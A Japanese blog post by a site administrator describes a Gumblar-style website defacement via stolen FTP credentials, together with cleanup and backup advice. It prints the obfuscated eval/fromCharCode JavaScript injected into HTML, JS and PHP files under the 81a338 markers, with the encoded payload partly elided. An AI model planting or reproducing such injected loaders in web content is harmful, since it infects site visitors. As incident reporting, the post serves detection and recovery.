WEBサイト改ざん被害

メルです。

かなり仕事を休んでしまったので
「さぁ、仕事!仕事!」と思いきや、
管理しているある企業のサーバーに
不振なFTPアクセスが・・・

アクセス元は、

など・・・。

これはやばいのでは?と思いながら
サーバーの中身を見ると、
なんと大量のファイルが改ざんにあっているではありませんか。

改竄されたページにアクセスすると訪問者のパソコンが
感染し、被害が広まると言うオマケ付き。

改竄されたファイルは、HTMLファイル、JavaScriptファイル、
一部PHPファイルで、<!–81a338–>、/*81a338*/から始まる
JavaScript、iframe などの埋め込みが特徴。

他にも81a338の代わりに0c0896や、ded509などの6桁の
英数字のものもあるようです。

状況から見て、
これは最近非常に被害が増えているパターンで
ガンブラーなどのウイルスやスパイウエアに感染し、
パソコンからFTP情報を搾取され、改竄されている
可能性が高い。

 

 

流石にこれはまずいので、
サイトを閉鎖し、クライアント企業に連絡。

全てのパソコンのウイルスチェックをしてもらい、
サーバー、FTPへのアクセス制限を行い、
全てのパスワードの変更と共に復旧作業に取り掛かることに。

因みに改ざん被害にあったファイルには以下のコードが追加されていました。

 

改ざんされたHTMLファイル

<!--81a338--><script type="text/javascript" language="javascript" >gakqf="s"+"p"+"li"+"t";srkjb=window;fpr="dy";txm=document;rcigwm="0x";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv="17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:58:5c:17:34:17:5b:66:5a:6c
     ・
     ・中略
     ・
5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:58:5c:27:30:1f:20:32:4:1:74:4:1:74"[gakqf](":");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String["fromCharCode"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script><!--/81a338-->

 

改ざんされたJavaScriptファイル

/*81a338*/
ragir="s"+"p"+"li"+"t";negu=window;zwh="dy";vqpoo=document;rauffm="0x";blye=(5-3-1);try{++(vqpoo.body)}catch(xdomas){jioz=false;try{}catch(dhncm){jioz=21;}
if(1){przkl="17:5d:6c:65:5a:6b:60:66:65:17:60:5d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:
     ・
     ・中略
     ・
2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5d:27:30:1f:20:32:4:1:74:4:1:74"[ragir](":");}negu=przkl;ljy=[];for(cahkv=22-20-2;-cahkv+1374!=0;cahkv+=1){lufim=cahkv;if((0x19==031))ljy+=String["fromCharCode"](eval(rauffm+negu[1*lufim])+0xa-blye);}klc=eval;klc(ljy)}
/*/81a338*/

 

改ざんされたPHPファイル

#81a338#
if(empty($qk)) {
$qk = "<script type=\"text/javascript\" language=\"javascript\" >gakqf=\"s\"+\"p\"+\"li\"+\"t\";srkjb=window;fpr=\"dy\";txm=document;rcigwm=\"0x\";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:
     ・
     ・中略
     ・
4:1:74:4:1:74\"[gakqf](\":\");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String[\"fromCharCode\"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script>";
echo $qk;
}
#/81a338#

 

このサーバーには月商300万円のネットショップが入っていたので
スピード勝負。

結局なんだかんだで復旧までに丸1日かかってしまいましたが(笑

最近、CMSなどの脆弱性をついた攻撃や、
今回のようにパソコンから情報を搾取しての攻撃など、
非常に被害が広まっています。

またWEBサイトにアクセスするだけでも感染するものも
多数あります。

どこか遠い世界の出来事ではなく、
誰もがいつでも感染する可能性があります。

パソコンのセキュリティはしっかりと導入し、
まめにスキャンして、皆さんも気をつけて下さい。

 

 

— 10/3追記 —

 

このタイプの被害にあった場合の対処法は、
81a338で入れ子になっている部分の記述を削除するしかありません。

被害にあっている事に気付くのが遅いと、
数百から数千ものファイルが書き換えられているため、
手動でファイルを開いて削除していたら大変です。
日頃からサーバー内の全ファイルのバックアップを
まめに取っておく事をお勧めします。

バックアップさえあれば、FTPで一括上書きアップロードで対応できます。

 

 

この投稿は役に立ちましたか? 役に立った 役に立たなかった

 

ネットビジネス速報メールマガジン

 

メルのネットビジネス速報では、悪質高額塾などの被害が拡大しないように
新しい悪質販売者の情報が入り次第、速報でお伝えいたします。

Dreamweaver、Fireworks、PhotoshopなどのTipsやチュートリアルの紹介、
最新SEO情報、その他ネットビジネスに関する情報をいち早く配信しています。

お名前(必須)
メールアドレス(必須)

One Response to “WEBサイト改ざん被害”

  1. […] これは前回、WEBサイト改ざん被害の記事でも書きかましたが、 管理しているパソコンからFTPのパスワードを抜き取られて改竄されます。 […]

記事「WEBサイト改ざん被害」にコメントを残す

*

サブコンテンツ

危険な高額塾

タグ

クラウド入力機能 Agency Business 秀吉塾天下統一 JavaScript せどり スクロール explorer android IBS 自己アフィリ 復元 山下 ドメイン WEB クリックランキング ランキング ツイッター 音量アイコン Youtube ぼかし 無料オファー 管理ツール アンダーグラウンドメソッド 81a338 転売大園塾 メモ 関根塾 ソースコード 比較 小笠原健一 アイコン ライオンアフィリエイト 大園転売塾 WP 自動 池田純矢 レイアウト 管理画面 伊藤 虎太郎 北川 雅嗣 IE css アンダーグラウンドアフィリエイトクラブ フレンドシップメール 個人情報 MovableTYpe 与沢翼×蝶乃舞 インターネットビジネススクール ネオヒルズアカデミー 与沢翼 twitter クラウド変換 権利収入 自己アフィリエイト 不正送信 パズル 株式会社ニュース Ban Hammer インフォトップ ワードプレス 配布 高速ゲーム IP Newpost Catch .htaccess ハート 画像 情報商材 tool アクセス制限 wordpress Extension Manager Chrome ムーバブルタイプ CS6 SyntaxHighlighter SEO 副業術 放射線 プラグイン レタープレス Favicon サイト改ざん ネットビジネス大全集 関根義光 Yahoo getElementById 表示 ブロック 株式会社バンザイ KMSpico もざ スカイプ 大園麗花 不正アクセス LinkShaker ネットガレージ マイクロソフト BUYMA ウインドウ 大園式転売塾 背景 新井浩 ウイルス ブロックポリシー アクセスアップ アドセンス テーマ 申請金ビジネス ネットビジネス コピーボタン 蝶乃舞 アフィ匠 html PPC エクスプローラー テンプレート 切抜き Diamond Affiliate Masters Program 自動化 トラフィック ping system 既得権益 流出 High Concept Marketing 改竄 賢威 FTP スムーズ 不労所得の神 ping送信 シャンプー 日本語入力変換ソフト スタイルシート Windows 7 村上省吾 ECサイト 株式会社WINGOOD ネットビジネス最後の楽園 到達率 document.all ブラウザ 特権ビジネス DOCTYPE Tiger-Wing ユーチューブマニアクス2017 functions.php バナー HTML4.0 土屋ひろし ボタン マニュアル 優先順位 force puzzle 大西良幸 改ざん インターネット ネットショップ がら空きビジネス getElementByTagName KMS認証 無料 プロモーション 脆弱性 ヤフー Windows アレックス式ネオせどりスクール ソフト インターネットエクスプローラー バイドゥー ライブチャット スマホ トレンドアフィリエイト 百度 MasterCollection サンタ 株式会社A-ブログレス クロスアフィリエイト 短縮URL RSS google 球体 エクスチェンジ マルウエア postpost レンタルサーバー 伊藤虎太郎 登録禁止 加工 ブルートフォースアタック ブラクラ ヤフーショッピング YouTube Maniax 2017 EC トレンドキーワード 伊藤塾 SKナレッジ 固定ページ タスクバー エキスパートメール iphone 伊藤 歩 リンクシェイカー RMT ライン @PAGES やしろ塾 三橋美仁 秒速で1億円稼ぐ男 クラック Thunderbird Cash on Wordpress moza レビュー ロリポップ 詐欺 定型文 株式会社Free Agent Style 出店料 やしろひろたみ Adobe 特定のメールアドレス office フォローマティック 中山秀人 MT ネットゲーム SmoothScroll.js XHTML ざくざく君 メルマガ配信システム CGI Google Maps API 上位表示 久積篤史 切り抜き BBIZ 株式会社SRシステム 詐欺組織 原田真 Wordpress Content Slide 量産 followmatic ファビコン エディタ Firefox バイマ wp-login.php タイガーウイング RSS Includes Pages Line デスクトップ アレックス ブラシ グラデーション 感染 ソース 株式会社SRシステム 石井匠 モザイク FireWorks Baidu プロファイル アフィリエイト 滑らか ツール CS5 加藤 秀吉 宮田麗花 ビジネス PHP 高額塾 インペリアルゴールド wpXサーバー 個人情報流出 無断送信 カスタマイズ Login LockDown バックアップ Internet Explorer 人物 短縮URLツール DTD レイアウト崩れ 掲示板 立体 ヤフオク Google Maps セキュリティ

アーカイブ

エステトラブル

このページの先頭へ